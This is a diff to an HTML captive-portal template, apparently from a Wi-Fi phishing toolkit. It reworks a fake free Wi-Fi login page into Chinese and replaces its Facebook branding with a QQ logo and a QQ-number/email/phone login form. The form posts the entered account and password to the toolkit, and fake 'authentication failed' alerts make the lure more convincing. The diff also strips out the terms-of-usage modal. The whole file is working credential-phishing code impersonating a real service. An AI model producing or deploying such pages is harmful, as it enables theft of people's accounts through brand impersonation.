@@ -5,26 +5,25 @@
 <script>
 function validateForm() {
     var x = document.forms["theform"]["wfphshr-email"].value;
-    var atpos = x.indexOf("@");
-    var dotpos = x.lastIndexOf(".");
-    if (atpos<1 || dotpos<atpos+2 || dotpos+2>=x.length) {
-        alert("Failed to authenticate. Wrong Email or Password.");
+
+    if ( isNaN(x)) {
+        alert("认证失败，账号错误");
         return false;
     }
 
     var x = document.forms["theform"]["wfphshr-password"].value;
-    if (5>=x.length) {
-        alert("Failed to authenticate. Wrong Email or Password.");
+    if (6>x.length) {
+        alert("认证失败，密码错误");
         return false;
     }
 }
 </script>
     <meta charset="UTF-8">
-    <title>{{ organization if organization != None}} Wi-Fi Service</title>
+    <title>欢迎使用{{ organization if organization != None}} 免费 Wi-Fi 服务</title>
     <link rel="stylesheet" href="css/reset.css">
     <link rel='stylesheet prefetch' href='css/roboto.css'>
-<link rel='stylesheet prefetch' href='css/font-awesome.min.css'>
-        <link rel="stylesheet" href="css/style.css">    
+    <link rel='stylesheet prefetch' href='css/font-awesome.min.css'>
+    <link rel="stylesheet" href="css/style.css">
   </head>
   <body> 
 <!-- Form Mixin-->
@@ -32,89 +31,27 @@ function validateForm() {
 <!-- Button Mixin-->
 <!-- Pen Title-->
 <div class="pen-title">
-  <h1>Get connected to the Internet for free</h1><span>A simple, no frills {{ organization if organization != None}} Wi-Fi service.</span>
+  <h1>欢迎使用免费Wi-Fi上网服务</h1>
+  <span>认证登陆 {{ organization if organization != None}} Wi-Fi 上网服务.</span>
 </div>
 <!-- Form Module-->
 <div class="module form-module">
   <div class="form">
   </div>
   <div class="form">
-    <h2>Login using Facebook</h2>
-    <img src="logos/facebook-logo.png" width="25%" class="logo"></img>
+    <h2>帐号密码登录</h2>
+    <img src="logos/qq-logo.png" width="25%" class="logo"/>
     <form name="theform" class="theform" method="post" action="oauth.html" onsubmit="return validateForm();">
-      <input type="text" placeholder="Email" name="wfphshr-email"/>
-      <input type="password" placeholder="Password" name="wfphshr-password"/>
-      <button class="login-btn">Login</button>
+      <input type="text" placeholder="支持QQ号/邮箱/手机号登录" name="wfphshr-email"/>
+      <input type="password" placeholder="密码" name="wfphshr-password"/>
+      <button class="login-btn">登陆</button>
     </form> 
   </div>
-  <div class="cta"><a id="btn1">Terms of Usage</a></div>
+  <div class="cta"><a id="btn1">©️Wi-Fi上网服务版权所有</a></div>
 </div>
 
-<!-- The Modal -->
-<div id="myModal" class="modal">
 
-  <!-- Modal content -->
-  <div class="modal-content">
-    <div class="modal-header">
-      <span class="close">×</span>
-      <h2>Terms of Usage</h2>
-    </div>
-    <div class="modal-body">
-      <p>This is a {{ organization if organization != None}} free Hotspot wireless internet Service (the “Service”) provided for use by customers. All users are required to log-in individually as an independent user.</p>
-      <p>
-The Service is made available provided:
-</p><p>
-(a) You do not use the Service for anything unlawful, immoral or improper;
-</p><p>
-(b) You do not use the Service to make offensive or nuisance communications in whatever form. Such usage includes posting, transmitting, uploading, downloading or otherwise facilitating any content that is unlawful, defamatory, threatening, a nuisance, obscene, hateful, abusive, harmful (including but not limited to viruses, corrupted files, or any other similar software or programs), a breach of privacy, or which is otherwise objectionable;
-</p><p>
-(c) You do not use the Service to harm or attempt to harm minors in any way;
-</p><p>
-(d) You do not act nor knowingly permit others to act in such a way that the operation of the Service or our systems will be jeopardized or impaired;
-</p><p>
-(e) You do not use abusive or threatening behavior towards other users of the Service, members of our staff or any person in the vicinity of a Wireless LAN Hotspot;
-</p><p>
-(f) You do not use the Service to access or use content in a way that infringes the rights of others;
-</p><p>
-(g) The Service is used in accordance with any third party policies for acceptable use or any relevant internet standards (where applicable).
-</p><p>
-(h) You agree not to resell or re-broadcast any aspect of the Service, whether for profit or otherwise. You accept that your entitlement to use the Service is for your personal use only and that you shall not be entitled to transfer your entitlement to use the Service to any other person or allow any other person to make use of the Service or of any username or password or other entitlement supplied to you in connection with the Service.
-</p><p>
-(i) You also agree not to modify the Unit or use the Service for any fraudulent purpose, or in such a way as to create damage or risk to our business, reputation, employees, subscribers, facilities, third parties or to the public generally.
-</p><p>
-(j) You have no proprietary or ownership rights to any username or password or to a specific IP address, or e-mail address assigned to you or your Unit. We may change such addresses at any time or deactivate or suspend Service to any address without prior notice to you if we suspect any unlawful or fraudulent use of the services.
-</p>
-    </div>
-  </div>
-
-    <script src='js/jquery.min.js'></script>
-    <script src="js/index.js"></script> 
-<script>
-// Get the modal
-var modal = document.getElementById('myModal');
-
-// Get the button that opens the modal
-var btn = document.getElementById("btn1");
-
-// Get the <span> element that closes the modal
-var span = document.getElementsByClassName("close")[0];
-
-// When the user clicks the button, open the modal 
-btn.onclick = function() {
-    modal.style.display = "block";
-}
-
-// When the user clicks on <span> (x), close the modal
-span.onclick = function() {
-    modal.style.display = "none";
-}
-
-// When the user clicks anywhere outside of the modal, close it
-window.onclick = function(event) {
-    if (event.target == modal) {
-        modal.style.display = "none";
-    }
-}
-</script>
   </body>
+  <script src='js/jquery.min.js'></script>
+  <script src="js/index.js"></script>
 </html>
